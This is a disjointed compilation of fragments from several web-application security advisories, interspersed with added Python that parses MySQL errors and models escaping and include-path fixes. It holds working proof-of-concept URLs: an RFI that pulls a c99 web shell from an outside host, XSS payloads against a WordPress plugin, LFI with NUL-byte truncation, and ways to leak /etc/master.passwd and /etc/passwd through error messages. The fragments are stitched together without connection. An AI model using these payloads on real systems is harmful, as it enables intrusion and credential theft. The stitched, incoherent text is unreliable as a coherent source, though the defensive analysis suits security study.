and regedit application open. Log off the workstation, and then log
back in to your domain account. Refresh the NL$ list. The NL$ line
item that has been updated is your domain user's cached session.
Step 6: For this example, we will assume that your NL$ record is "NL$4"
Step 7: Double click on "NL$4". Take note of the four hex digits (two bytes) at positions 1 to 4 on line 3 of the hex data.
Step 8: For this example, the hex characters are "5a 04". Active Directory stores the objectSID as an octet string with each sub-authority in little-endian byte order, and these are the low two bytes of the relative identifier (RID), the final sub-authority that is unique to your account (the high two bytes are 00 00 for any RID below 65536). Read little-endian, "5a 04" is 0x045a, RID 1114.
https://target-domain.foo:2381/hmanics/hmanics.snmp.php
For Windows:
Fatal error: Call to undefined function QueueSNMP() in
C:\hp\hpsmh\data\htdocs\hmanics\hmanics.snmp.php.en on line 3
For Linux:
Fatal error: Call to undefined function QueueSNMP() in
/opt/hp/hpsmh/data/htdocs/hmanics/hmanics.snmp.php.en on line 3
--- SQL Exception Logs ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ` -1` at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near `-1` at line 2
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ` -1 ` at line 3
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ` -1 `at line 4
Use the "Execute SQL" feature of the mysql module and pass "/etc/master.passwd" as the path of the .sql file to run. MySQL cannot parse the file, and the syntax error it returns echoes the text it choked on, so the first line of the file (the root entry, hash included) comes back in the error:
-- cut --
Output from SQL commands in file /etc/master.passwd ..
ERROR 1064 (42000) at line 3: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the
right syntax to use near 'root:$1$HASH_HERE.:0:0::0:0:Charlie
&:/root:/usr/local/bin/' at line 1
-- cut --
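Both outputs above rely on the same behaviour: a MySQL 1064 error quotes the input it failed to parse, which is the signal for error-based injection in the exception logs and the channel that leaks the password file in the "Execute SQL" run. The following is an added example, not from the original post: a small parser that pulls the echoed fragment and line number out of such messages and recognises a leaked master.passwd record. The sample responses are constructed to mirror the two outputs above.

```python
import re

# Constructed sample responses, modelled on the two outputs above: a response
# carrying the injected " -1" and the "Execute SQL" run over /etc/master.passwd.
# They are not captured from a live system.
SAMPLES = [
    "You have an error in your SQL syntax; check the manual that corresponds "
    "to your MySQL server version for the right syntax to use near ` -1` at line 1",
    "ERROR 1064 (42000) at line 3: You have an error in your SQL syntax;\n"
    "check the manual that corresponds to your MySQL server version for the\n"
    "right syntax to use near 'root:$1$HASH_HERE.:0:0::0:0:Charlie\n"
    "&:/root:/usr/local/bin/' at line 1",
    "<html><body>Welcome back, user 1</body></html>",
]

# MySQL echoes the text it could not parse after "near", quoted with ' (or `
# in some log formats), followed by the line number inside the statement.
MYSQL_SYNTAX = re.compile(
    r"You have an error in your SQL syntax;.*?right syntax to use near\s*"
    r"(?P<q>['`])(?P<near>.*?)(?P=q)\s*at line (?P<line>\d+)",
    re.DOTALL,
)

# Fields of a BSD master.passwd line, in order.
MASTER_PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "class",
                        "change", "expire", "gecos", "home", "shell")


def parse_mysql_error(text):
    """Return {"near", "line", "errno"} for a MySQL syntax error message, else None."""
    m = MYSQL_SYNTAX.search(text)
    if m is None:
        return None
    # Mail clients and terminals wrap long lines; collapse that whitespace so
    # the echoed fragment is one line again.
    near = " ".join(m.group("near").split())
    errno = re.search(r"ERROR (\d+) \(", text)
    return {"near": near,
            "line": int(m.group("line")),
            "errno": int(errno.group(1)) if errno else None}


def master_passwd_record(near):
    """Split an echoed fragment that looks like a master.passwd line into fields; None otherwise."""
    fields = near.split(":")
    if (len(fields) != len(MASTER_PASSWD_FIELDS)
            or not fields[2].isdigit() or not fields[3].isdigit()):
        return None
    return dict(zip(MASTER_PASSWD_FIELDS, fields))


def scan(responses):
    """Find every response that leaks a SQL syntax error, with any credential line it carried."""
    hits = []
    for text in responses:
        err = parse_mysql_error(text)
        if err:
            err["passwd_record"] = master_passwd_record(err["near"])
            hits.append(err)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(hit)
```

Note that the trailing field of the leaked line is cut at "/usr/local/bin/": the error only carries as much of the offending text as MySQL chose to quote, so longer lines come back truncated.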
> #Location : Turkey
> ########################################################################
> #file :
> # init.poll.php
> # line 2 $inc_path = dirname($include_class);
> # line 3 require ($inc_path."/voting.poll.php");
> ########################################################################
> #3xplo!t :
> #http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt?
> ########################################################################
> #eser@ekin0x.com (all crew shell)
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E
Register Globals: Off
Vuln Line:(3) <input type="hidden" name="page" value="<?php echo $_GET['page'] ?>"/>
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
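The vulnerable line echoes $_GET['page'] inside a double-quoted attribute, so a value beginning with `">` closes the attribute and the tag and whatever follows is parsed as markup. The following is an added example, not the plugin's code: it renders that line with the raw value and with the equivalent of htmlspecialchars($page, ENT_QUOTES) (an assumed fix), and rebuilds the PoC URL from the decoded payload.

```python
import html
from urllib.parse import quote

# The URL-decoded payload carried by the PoC URLs above (constructed here from
# the encoded form in the advisory).
PAYLOAD = '"><script>alert("XSS")</script>'
PAGER_URL = "http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php"


def render_pager_vulnerable(page):
    """Same output as the vulnerable template line: $_GET['page'] echoed raw
    inside a double-quoted attribute."""
    return '<input type="hidden" name="page" value="%s"/>' % page


def render_pager_fixed(page):
    """The same line with the equivalent of PHP htmlspecialchars($page, ENT_QUOTES)
    (assumed fix, not the plugin's own): & < > " ' are escaped, so the value can
    no longer close the attribute or start a tag."""
    return '<input type="hidden" name="page" value="%s"/>' % html.escape(page, quote=True)


def attribute_intact(markup):
    """Crude oracle: exactly one tag should be present and no script element."""
    return markup.count("<") == 1 and "<script" not in markup.lower()


def poc_url(base, param, payload):
    """Rebuild the advisory-style URL; safe="()/" leaves parentheses and the
    slash unencoded, exactly as the published PoC does."""
    return "%s?%s=%s" % (base, param, quote(payload, safe="()/"))


if __name__ == "__main__":
    print(render_pager_vulnerable(PAYLOAD))
    print(render_pager_fixed(PAYLOAD))
    print(poc_url(PAGER_URL, "page", PAYLOAD))
```

With the raw value the output contains a second tag, `<script>alert("XSS")</script>`, after the closed input element; with escaping the same input stays inside the attribute as `&quot;&gt;&lt;script&gt;...`.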
3) Remote Code Execution
cxib#
result.txt has been created.
cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:"
..... etc.
We can read the file, so safe_mode and open_basedir are bypassed.
| {
| echo "<meta http-equiv='refresh' content='0;URL=install.php'>";
| exit;
| }
Your redirection is in line 6, the RFI in line 3.
First hit wins: RFI. ;-)
Regards,
Carsten
Requested URL:
https://moodle.target.ac.uk/course/report/stats/report.php
Response:
Fatal error: Call to undefined function get_courses() in
/Volumes/<dir_name>/data/moodle/course/report/stats/report.php on line 3
Tested environment:
http://localhost/torrenttrader109/backend/Admin-functions.php
"Warning: require_once(./themes//block.php) [function.require-once]:
failed to open stream: No such file or directory in
C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3"
If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible:
http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00
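Both this TorrentTrader include and the init.poll.php advisory quoted earlier build the include path from a request parameter, and whether the published payload lands depends on string handling the advisories only hint at: the %00 truncation here needs magic_quotes_gpc off (otherwise the NUL arrives as a backslash-zero) and a PHP older than 5.3.4 (later versions refuse paths containing NUL), and in init.poll.php dirname() discards the last path component, so the file actually fetched for the published PoC is /voting.poll.php on the attacker's host, not c99.txt. The following is an added example, not code from either project: it models both include lines in Python (posixpath.dirname matches PHP dirname() on forward-slash strings) and shows a hardened form. The install path and the hardened function are assumptions.

```python
import posixpath
import re

# Assumed install location (the advisory's Windows path was
# C:\apache_wwwroot\torrenttrader109; a Unix layout is modelled here).
BACKEND_DIR = "/var/www/torrenttrader109/backend"
THEMES_DIR = BACKEND_DIR + "/themes"


def magic_quotes_gpc(value):
    """What magic_quotes_gpc=on does to request data: backslash-escape \\ ' \" and NUL."""
    return (value.replace("\\", "\\\\").replace("'", "\\'")
                 .replace('"', '\\"').replace("\x00", "\\0"))


def torrenttrader_include(ss_uri, magic_quotes=False, php_before_5_3_4=True):
    """Model of require_once("./themes/".$ss_uri."/block.php") run from BACKEND_DIR.

    Returns the path the include resolves to, or None where PHP 5.3.4+ rejects
    a path containing a NUL byte. Older PHP handed the C string to the
    filesystem, so everything after the NUL was silently dropped.
    """
    if magic_quotes:
        ss_uri = magic_quotes_gpc(ss_uri)
    raw = "./themes/" + ss_uri + "/block.php"
    if "\x00" in raw:
        if not php_before_5_3_4:
            return None
        raw = raw.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(BACKEND_DIR, raw))


def init_poll_include(include_class):
    """Model of init.poll.php lines 2-3: dirname($include_class) . "/voting.poll.php".

    posixpath.dirname behaves like PHP dirname() on forward-slash strings: a
    URL keeps its scheme and host and only the last component is discarded.
    """
    return posixpath.dirname(include_class) + "/voting.poll.php"


def is_remote_include(path):
    """True when the computed include target is a URL (a stream wrapper, i.e. RFI)."""
    return bool(re.match(r"^[a-z][a-z0-9+.-]*://", path))


def safe_theme_include(ss_uri):
    """Hardened form (assumed fix): allow-list the theme name and check that the
    resolved path stays under THEMES_DIR. Returns None when the value is rejected."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+", ss_uri):
        return None
    candidate = posixpath.normpath(posixpath.join(THEMES_DIR, ss_uri, "block.php"))
    if not candidate.startswith(THEMES_DIR + "/"):
        return None
    return candidate


if __name__ == "__main__":
    lfi = "../../banners.txt\x00"
    print("no magic quotes, old PHP:", torrenttrader_include(lfi))
    print("magic quotes on:         ", torrenttrader_include(lfi, magic_quotes=True))
    print("PHP >= 5.3.4:            ", torrenttrader_include(lfi, php_before_5_3_4=False))
    print("init.poll.php fetches:   ", init_poll_include("http://www.ekin0x.com/c99.txt?"))
    print("hardened:                ", safe_theme_include(lfi), safe_theme_include("default"))
```

The empty-parameter case reproduces the `./themes//block.php` warning quoted above; the traversal case resolves to banners.txt two directories up, which is what the PoC reads.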